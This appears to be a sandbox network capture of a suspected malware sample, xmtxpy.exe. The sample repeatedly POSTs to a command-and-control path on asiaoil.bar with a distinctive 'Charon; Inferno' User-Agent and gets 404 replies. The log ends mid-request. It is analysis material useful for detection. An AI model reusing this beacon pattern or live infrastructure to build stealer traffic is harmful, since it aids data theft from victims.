                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    38 | 192.168.2.22 | 49203 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:43.544899940 CET | 378 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:43.664395094 CET | 379 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yKL07jfvs%2BVU4LY4v4Lf0ZGlr%2FIQtMwEPs3bXhHAZspcC%2BNoewD0Rp%2Bye%2FUTm0R72TSKjFoKvNaY7JUUOQLFHqLgLo%2BRTvtpResbSpFvDqoGUIkATecZSSRbWV5rqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4464e3d16912a-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    39 | 192.168.2.22 | 49204 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:44.584137917 CET | 380 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:44.682432890 CET | 381 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YEpekNteQXIJDJauaElbNeLCz0rJIFKhZ7g570xBDVwmYpo12zP6dtthdwoFyYhQ53RMVLKxNG0u7RjPVwRtZkMkV1Qw90wv9Z0CU6vQQlTHweFh1xgcsARiAUxjiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44654bfd79199-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    4 | 192.168.2.22 | 49169 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:04.920207977 CET | 318 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:05.027216911 CET | 318 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WGSy9RBpA4nwv8vPkiC6IlReHDy2beH0Xpr8Jw91%2BmfmRccN%2FYfWCgt%2Fb96BC2i38aPjRgJdSwh7RJOrlqreqeiX8LTLhluVlMMPLsLX%2BVqck485IQfR0ZCBs3Abjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4455ccab45c80-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    40 | 192.168.2.22 | 49205 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:45.641460896 CET | 382 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:45.752800941 CET | 383 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vgBF41clmh4ryuHtU9aOlwd5HEGXjVWqgWBKt0N2O3lBaHqKVGyePCSnXUW7Z%2B9ZswG3zzpAggxRL3OI9PhK3b7diqp15dvDHTlhkQ9V7NyyEid0hjMzsNR7GBdvGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4465b4f709186-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    41 | 192.168.2.22 | 49206 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:46.729665995 CET | 383 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:46.816407919 CET | 384 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qIeTn8QUGJ4PzoL3khYwIjL17%2BBJiTqpZBu%2Bn6l1sSUiSmu%2FH0zc5lyfpLKOHy9tsuu9Y%2F%2BH47s3hpg5DfFC4zroN87eErlds3zDKfV6u79W6o1WqB%2F6UGbnxHqWFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446621d638fc5-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    42 | 192.168.2.22 | 49207 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:47.737185955 CET | 385 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:47.842878103 CET | 386 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6LETH6p%2BXICZC%2BrIHSRQApAEV%2Bdr0iLIW7rBeA%2Fr7Hi4%2Fpf1OlVs9AUjZdSrzw3XtXmW7vu3g0lnMlRgI0IK52z10KSNGVwmWG%2FAp9wtB9EgWL0CS5tO1Mwb6FiG8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446686e9b6945-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    43 | 192.168.2.22 | 49208 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:48.837397099 CET | 387 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:48.933581114 CET | 388 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M4V5E6ygM8Zq2gQc6SjFi%2FduljsFbImOHJ2nmf7IuPxW2RhXkT%2B0BhOAD5WjYjJ5QxUVoGAUnhyaY3n4fiulEfle%2F5%2F3JKoNA8quALyniLNaaaxsFzuwruQ92V8j%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4466f4f5c92a2-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    44 | 192.168.2.22 | 49209 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:49.900198936 CET | 389 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:50.045497894 CET | 390 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sfchENBNL5Aam3jQilD1C%2BA7X%2BWklnynb2xLSVS2hPjR0y3qmNn6hmUtwb8IQB8oZoMl23JHAHV2q0I12pykgsoVoLNPvb6k5VdZyObk9ltGFYeKlP7GBpYhUI6%2BpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44675ef0390ee-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    45 | 192.168.2.22 | 49210 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:51.041532993 CET | 391 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:51.130028963 CET | 392 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Tlu5Y7AoBorQeMU0%2B32D%2BTFyCDvUY1OQkVB8rypJEdhrQ%2Fenzeu1n%2FT9n9uSqWWX9J%2BfmRJVbTKpt0De%2B5ne1ly1J723TtCWodVcJOhHfjabsPPmaz0oqCOHEICNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4467d0fb492c5-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    46 | 192.168.2.22 | 49211 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:52.063119888 CET | 392 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:52.182354927 CET | 393 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqldRdslDF9crV%2Bk4ngGcH%2B5VotqLHwZM1hgM1UlLzVHOK203cYnXP5jYPCyykRHqAUueXlxKMSBzyNAjlM%2Fvqw8Nwi0ss%2FzYQhSE9EUH9wjaK0hKyn3kcN4463E9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446836b79922b-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    47 | 192.168.2.22 | 49212 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:53.153614998 CET | 394 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:53.252991915 CET | 395 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yBS7%2BxqKYn8UXFWYtCxhAQUq3wICMu07YMkjyXgzMiD7WnMo34wuo3JBZQt3f%2FvhAz73H9wPdN018HSvgXnDpUBiOvoVzzkvgWsPGM8s4%2F62axP9o7SVvlxiAsFAoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4468a3cbe8fc8-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    48 | 192.168.2.22 | 49213 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:54.210618019 CET | 396 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:54.306786060 CET | 397 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K0AcT1bifDuMhi7ufsGdy3ZWrMEsl7Ml0%2BBsoYKk1Le07SGb1K3vfiYvudRQACEJNwZd7L%2BjjiNvFHdUhY8ZVQ%2FCWgWD2crnmZAbKNk%2BQ47TcQ8b%2FoLYdTuy2B3gQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44690dd409094-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    49 | 192.168.2.22 | 49214 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:55.222618103 CET | 398 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:55.306236029 CET | 399 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2b3lnzs0K50M9KlApGlxtS1%2FGBbpcngBLWZrh0QHIPyWMt9R51HhBbpbNzNiN2fgnCx%2F6Ol9cv3FYjGdC9Z4%2Ff%2B7v%2FeKPnRbogo3FCV4owbNiUoY5%2BcPZ%2FGa%2BNALAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446972bed9091-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    5 | 192.168.2.22 | 49170 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:05.958935022 CET | 319 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:06.048285007 CET | 320 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FkwECIztonU5sKraKeo0SBfQsbzTNEo9c%2Fgv1LcFjyGRwr%2BO5HxPKVAbUysSrtRDLw4YSAITjFTpY93Ba0oLX8DHultt24WrAHZv82zviiHQIIiLmBXtIoOyR3vI7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44563480c9225-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    50 | 192.168.2.22 | 49215 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:56.235039949 CET | 400 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:56.328077078 CET | 400 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lLUedeVgcznC2S%2FUOpbd3fV7v3cGuLCjsT%2FMbiJAVwvVHvZbCBonSZeAGG5JhojOiJyGydHeh3PL5Tp9nmU4EBUX2wVPhLZEEPBr7kenjFn1%2BoSu1sUFZrFUzTyPOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4469d8ada926e-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    51 | 192.168.2.22 | 49216 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:57.354640007 CET | 401 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:57.520679951 CET | 402 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pP7Hm%2FZYo7nBNCdlCm%2B6iCgzILR5XUlKf4GwH1GgSKX5qjvCOl3q7%2FhYlNsVlCRNbRgfIjWoULsECCJWVGVm8TwlUOckIQOjjEp9dOME2g%2F3YvZInDvXJ3pNqXehHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446a48a19903d-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    52 | 192.168.2.22 | 49217 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:58.437792063 CET | 403 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:58.535232067 CET | 404 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B4Hpj5tBS1W25DrOmF70H9%2B7tI00TcoHrZ2vWxTGczWKIQtBUxqfhFCMGDZXE%2FiPTxLHEXRSNrcwpGvMMbC3NGIUBMWmkmFsI9cJLit7sz%2BX56ge756zUtFrYA%2Fn%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446ab4e2a9049-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    53 | 192.168.2.22 | 49218 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:59.543742895 CET | 405 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:59.660451889 CET | 406 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j%2BJFLdnSBYTENDu1tAbRmg3yPPpEafzaD1AIG2OO%2FT%2B%2FQqTuiDGTxzFlf9dnChU0IP%2BEp15Zkavznvg6v0hcTAYsTYetiP8tjAE8TcK4xJqEQeCFqj2PFKCcO8YbOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446b23dcd9241-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    54 | 192.168.2.22 | 49219 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:00.557396889 CET | 407 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:00.711899996 CET | 408 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rk9UBUg8rEXXmstTEerwpTwam6ReU4ftvK8vLG6DGGX39NP0Tj8xTjWk5qWPBqpC6tqrpuX%2FZqaa1n1qmYBhnF44n8KZVoyEqklrYO98Ih0UxdfXxgiW0okoqK2%2FCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446b88b306963-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    55 | 192.168.2.22 | 49220 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:01.628313065 CET | 408 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
